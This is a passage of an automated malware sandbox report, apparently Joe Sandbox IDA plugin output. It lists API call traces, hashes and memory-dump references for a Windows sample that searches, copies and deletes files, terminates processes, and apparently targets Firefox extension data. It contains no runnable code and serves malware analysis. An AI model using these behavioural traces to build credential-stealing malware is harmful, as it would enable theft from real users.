                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcatlstrcpy
                                                            • String ID: vIs$vIs
                                                            • API String ID: 3905823039-325714837
                                                            • Opcode ID: 598425a922c2c5c6066208e6450a3dc13c3826aa555deb185a5883e2147382f2
                                                            • Instruction ID: 22e64df9565abd0eaa21dd4a6f6b032021b3f70d88a64a7637dd23662643b19f
                                                            • Opcode Fuzzy Hash: 598425a922c2c5c6066208e6450a3dc13c3826aa555deb185a5883e2147382f2
                                                            • Instruction Fuzzy Hash: C811E875900108EFCB05DF94D885AAEB3B5FF84300F108598E8159B351C734AE42CB91
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0074951E,00000000), ref: 00748D5B
                                                            • HeapAlloc.KERNEL32(00000000,?,?,0074951E,00000000), ref: 00748D62
                                                            • wsprintfW.USER32 ref: 00748D78
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocProcesswsprintf
                                                            • String ID: %hs
                                                            • API String ID: 659108358-2783943728
                                                            • Opcode ID: 2cbc273a3c1d7730ebe75bf894ac9ad8adca6ea56caa6d77b0f7b087854a1d72
                                                            • Instruction ID: fe229aea99fc32efd32934b0a17ca1cf4f5b38e2377af9f98e0e382cd0dfba5f
                                                            • Opcode Fuzzy Hash: 2cbc273a3c1d7730ebe75bf894ac9ad8adca6ea56caa6d77b0f7b087854a1d72
                                                            • Instruction Fuzzy Hash: 75E08CB2A54208BBC700DB94DC0AEAD77BCEB84702F040094FD0D87280DA75AE50ABA2
                                                            APIs
                                                            • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00743935
                                                            • StrCmpCA.SHLWAPI(?,00750F70), ref: 00743947
                                                            • StrCmpCA.SHLWAPI(?,00750F74), ref: 0074395D
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00743C67
                                                            • FindClose.KERNEL32(000000FF), ref: 00743C7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$CloseFileNextlstrcat
                                                            • String ID: !=t$P2#v
                                                            • API String ID: 3840410801-3600097812
                                                            • Opcode ID: 797bef105ab45e36ce3f9d2a44565fcdb5bb24d955656a2cf736abf12c6527b1
                                                            • Instruction ID: 1cac12a7a312699cae688dfcf47f57beee98dbe2b99fb9e234b42503024842b1
                                                            • Opcode Fuzzy Hash: 797bef105ab45e36ce3f9d2a44565fcdb5bb24d955656a2cf736abf12c6527b1
                                                            • Instruction Fuzzy Hash: 5AD012729041199BDB14DB94DD899A97378DB94305F0041C8B40E96110EB399B819B51
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                              • Part of subcall function 00748B60: GetSystemTime.KERNEL32(?,00FC4B40,007505AE,?,?,?,?,?,?,?,?,?,00734963,?,00000014), ref: 00748B86
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0073A2E1
                                                            • lstrlenA.KERNEL32(00000000,00000000), ref: 0073A3FF
                                                            • lstrlenA.KERNEL32(00000000), ref: 0073A6BC
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                              • Part of subcall function 00739E10: memcmp.MSVCRT(?,v20,00000003), ref: 00739E2D
                                                            • DeleteFileA.KERNEL32(00000000), ref: 0073A743
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                            • String ID:
                                                            • API String ID: 257331557-0
                                                            • Opcode ID: eb8fa2031b711efae50aebe726c9a7d0ae81ad0f2c715016b374a2789a0c7e02
                                                            • Instruction ID: 6572173ee20c28a1d61e7c84ae26954da52f2fd61711d16b2bea9c61ba9ba16f
                                                            • Opcode Fuzzy Hash: eb8fa2031b711efae50aebe726c9a7d0ae81ad0f2c715016b374a2789a0c7e02
                                                            • Instruction Fuzzy Hash: F1E1EE72950108FAEB05FBA4DC9AEEE737CEF54304F508169F51672091EF386A49CB62
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                              • Part of subcall function 00748B60: GetSystemTime.KERNEL32(?,00FC4B40,007505AE,?,?,?,?,?,?,?,?,?,00734963,?,00000014), ref: 00748B86
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0073D481
                                                            • lstrlenA.KERNEL32(00000000), ref: 0073D698
                                                            • lstrlenA.KERNEL32(00000000), ref: 0073D6AC
                                                            • DeleteFileA.KERNEL32(00000000), ref: 0073D72B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                            • String ID:
                                                            • API String ID: 211194620-0
                                                            • Opcode ID: 556b31ef9ea28f1eeae1e05099358b3ae0acff026304526b83f7ae0ecd516971
                                                            • Instruction ID: 8bbed56c3ae772983837476fac4307c7b7bfa7a9ac8893b577cbd93765c615a7
                                                            • Opcode Fuzzy Hash: 556b31ef9ea28f1eeae1e05099358b3ae0acff026304526b83f7ae0ecd516971
                                                            • Instruction Fuzzy Hash: 73910172950108EAEB05FBA0DC9AEEE737CEF54304F514168F51666092EF386A49CB62
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                              • Part of subcall function 00748B60: GetSystemTime.KERNEL32(?,00FC4B40,007505AE,?,?,?,?,?,?,?,?,?,00734963,?,00000014), ref: 00748B86
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0073D801
                                                            • lstrlenA.KERNEL32(00000000), ref: 0073D99F
                                                            • lstrlenA.KERNEL32(00000000), ref: 0073D9B3
                                                            • DeleteFileA.KERNEL32(00000000), ref: 0073DA32
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                            • String ID:
                                                            • API String ID: 211194620-0
                                                            • Opcode ID: 2ed0a9f43f38326d1a09bc395695dcb414812f381756d3aa308b80530aab91d4
                                                            • Instruction ID: 1b4f3dc9189dec01af0657865f6445aa9cd949f0534e60259f62b6c848db7e41
                                                            • Opcode Fuzzy Hash: 2ed0a9f43f38326d1a09bc395695dcb414812f381756d3aa308b80530aab91d4
                                                            • Instruction Fuzzy Hash: 71812472954104EBEB05FBA0DC5ADEE737DEF54304F414528F407A6092EF386A09CB62
                                                            APIs
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                              • Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
                                                              • Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
                                                              • Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
                                                              • Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,007402E7,00000000), ref: 00739A5A
                                                              • Part of subcall function 007399C0: LocalFree.KERNEL32(007402E7), ref: 00739A90
                                                              • Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A
                                                              • Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00751580,00750D92), ref: 0073F54C
                                                            • lstrlenA.KERNEL32(00000000), ref: 0073F56B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                            • String ID: ^userContextId=4294967295$moz-extension+++
                                                            • API String ID: 998311485-3310892237
                                                            • Opcode ID: 178837d3ac3983219a77f2f711eed9012078688166137871c8dd2606e06a60cc
                                                            • Instruction ID: 3dfec5e78dca315b81ad8f33e66af7d6a8c014785225051ae328afc1dac58f69
                                                            • Opcode Fuzzy Hash: 178837d3ac3983219a77f2f711eed9012078688166137871c8dd2606e06a60cc
                                                            • Instruction Fuzzy Hash: 7A51E071D50108FAEB15FBA4DC9ADED737CAF54304F508528F81666191EF386A09CBA2
                                                            APIs
                                                            • memset.MSVCRT ref: 007494EB
                                                              • Part of subcall function 00748D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0074951E,00000000), ref: 00748D5B
                                                              • Part of subcall function 00748D50: HeapAlloc.KERNEL32(00000000,?,?,0074951E,00000000), ref: 00748D62
                                                              • Part of subcall function 00748D50: wsprintfW.USER32 ref: 00748D78
                                                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 007495AB
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 007495C9
                                                            • CloseHandle.KERNEL32(00000000), ref: 007495D6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                            • String ID:
                                                            • API String ID: 396451647-0
                                                            • Opcode ID: 32bb784b87551dfc12ad89ce6488fe3969b09d8930f4a72326b345d0f70cc568
                                                            • Instruction ID: 33f72434bf25702d41cdf005c2037404110c4f828ede5e4769cbb083aacd11f2
                                                            • Opcode Fuzzy Hash: 32bb784b87551dfc12ad89ce6488fe3969b09d8930f4a72326b345d0f70cc568
                                                            • Instruction Fuzzy Hash: A9314F71E00208EFDB14DFD0CC49BEEB778FB44300F204559E60AAB184DB789A85DB52
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007505B7), ref: 007486CA
                                                            • Process32First.KERNEL32(?,00000128), ref: 007486DE
                                                            • Process32Next.KERNEL32(?,00000128), ref: 007486F3
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                            • CloseHandle.KERNEL32(?), ref: 00748761
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 1066202413-0
                                                            • Opcode ID: 061e53fbf4c39698ab0bda324f88bce4686dfee748bb8f5a28816b662e3d6b73
                                                            • Instruction ID: 7a392a55d61a1f51e4fa55d999ce01d94882c56aed66a5c23636ae55f810e9b6
                                                            • Opcode Fuzzy Hash: 061e53fbf4c39698ab0bda324f88bce4686dfee748bb8f5a28816b662e3d6b73
                                                            • Instruction Fuzzy Hash: F9316D71941218EBDB25DF90CC55FEEB778EB44700F1041A9E50AA21A0DB386E45CFA2
                                                            APIs
                                                              • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00748E0B
                                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00744F7A
                                                            • lstrcatA.KERNEL32(?,00751070), ref: 00744F97
                                                            • lstrcatA.KERNEL32(?,00FCD940), ref: 00744FAB
                                                            • lstrcatA.KERNEL32(?,00751074), ref: 00744FBD
                                                              • Part of subcall function 00744910: wsprintfA.USER32 ref: 0074492C
                                                              • Part of subcall function 00744910: FindFirstFileA.KERNEL32(?,?), ref: 00744943
                                                              • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FDC), ref: 00744971
                                                              • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FE0), ref: 00744987
                                                              • Part of subcall function 00744910: FindNextFileA.KERNEL32(000000FF,?), ref: 00744B7D
                                                              • Part of subcall function 00744910: FindClose.KERNEL32(000000FF), ref: 00744B92
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                            • String ID:
                                                            • API String ID: 2667927680-0
                                                            • Opcode ID: ceacf2f57a4f8925da754ebb4624d777604cde5b1c0c5d8cee5ef8e48711fb85
                                                            • Instruction ID: ea38c41ea9eaebef57b1cd3941709da6343c9cd021d14b8fcbd344a92cd26292
                                                            • Opcode Fuzzy Hash: ceacf2f57a4f8925da754ebb4624d777604cde5b1c0c5d8cee5ef8e48711fb85
                                                            • Instruction Fuzzy Hash: 582198B7914208ABD754FBB0DC4AFED337CABD4301F404554B65D92181EEB8AAC89B93
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00750E00,00000000,?), ref: 007479B0
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00750E00,00000000,?), ref: 007479B7
                                                            • GetLocalTime.KERNEL32(?,?,?,?,?,00750E00,00000000,?), ref: 007479C4
                                                            • wsprintfA.USER32 ref: 007479F3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocLocalProcessTimewsprintf
                                                            • String ID:
                                                            • API String ID: 1243822799-0
                                                            • Opcode ID: c813a343f89b8765742dd021e69429561b312b3a4e951f15df7986a4a10f9198
                                                            • Instruction ID: a76ec64370861e8c75fd41b769a078a56456670ccc8e41071564d93a72b8b2c3
                                                            • Opcode Fuzzy Hash: c813a343f89b8765742dd021e69429561b312b3a4e951f15df7986a4a10f9198
